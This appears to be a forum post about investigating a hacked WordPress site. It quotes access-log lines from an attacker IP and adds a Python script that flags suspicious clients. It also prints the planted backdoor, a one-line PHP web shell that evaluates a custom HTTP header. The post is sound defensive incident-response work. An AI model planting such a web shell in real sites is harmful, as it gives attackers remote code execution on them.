ozzWANTED
Hi,
In the Apache access log I see things like this:
Apache config:
185.10.68.183 - - [30/Jun/2020:04:04:21 +0300] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 5495 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
185.10.68.183 - - [30/Jun/2020:04:04:24 +0300] "GET /wp-admin/wp-update.php HTTP/1.1" 200 3889 "-" "curl/7.64.0"
185.10.68.183 - - [30/Jun/2020:04:04:24 +0300] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 5557 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
185.10.68.183 - - [30/Jun/2020:04:04:27 +0300] "GET /wp-admin/wp-update.php HTTP/1.1" 200 7320 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
And in the hacked file there is the following:
PHP:
<?php @eval($_SERVER['HTTP_33C5119052D55684']); ?>
So I see neither the curl, nor the _POST content, nor the _SERVER.
I want to be able to log all this for 30 days. How can I do that? Right now we cannot uncover the exact attack pattern used by the hacker.
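An added example, not part of the original post: a Python pass over the four access-log lines quoted above that flags a client presenting several user-agents within a short window, or a command-line tool user-agent. The 60-second window, the tool list and the function names are assumptions; the combined log format carries no request headers or POST bodies, so this shows who requested what and when, not what was sent.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "user-agent"
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')
# Assumed list of command-line / library clients; extend for your environment.
TOOL_UA = re.compile(r'^(curl|wget|python-requests|libwww-perl)', re.I)

# The four log lines quoted in the post, unchanged.
SAMPLE_LOG = """\
185.10.68.183 - - [30/Jun/2020:04:04:21 +0300] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 5495 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
185.10.68.183 - - [30/Jun/2020:04:04:24 +0300] "GET /wp-admin/wp-update.php HTTP/1.1" 200 3889 "-" "curl/7.64.0"
185.10.68.183 - - [30/Jun/2020:04:04:24 +0300] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 5557 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
185.10.68.183 - - [30/Jun/2020:04:04:27 +0300] "GET /wp-admin/wp-update.php HTTP/1.1" 200 7320 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
"""

def parse(lines):
    """Yield one dict per combined-format line; lines that do not match are skipped."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            rec = m.groupdict()
            rec["time"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
            yield rec

def suspicious_clients(lines, window=timedelta(seconds=60)):
    """Map client IP -> reasons and requested paths for clients worth a closer look."""
    by_ip = defaultdict(list)
    for rec in parse(lines):
        by_ip[rec["ip"]].append(rec)
    findings = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["time"])
        reasons = set()
        for i, r in enumerate(recs):
            if TOOL_UA.match(r["ua"]):
                reasons.add("tool-user-agent")
            # Distinct user-agents seen from this IP within `window` after request i.
            uas = {x["ua"] for x in recs[i:] if x["time"] - r["time"] <= window}
            if len(uas) > 1:
                reasons.add("user-agent-rotation")
        if reasons:
            findings[ip] = {"reasons": sorted(reasons),
                            "paths": sorted({r["path"] for r in recs})}
    return findings

if __name__ == "__main__":
    print(suspicious_clients(SAMPLE_LOG.splitlines()))
```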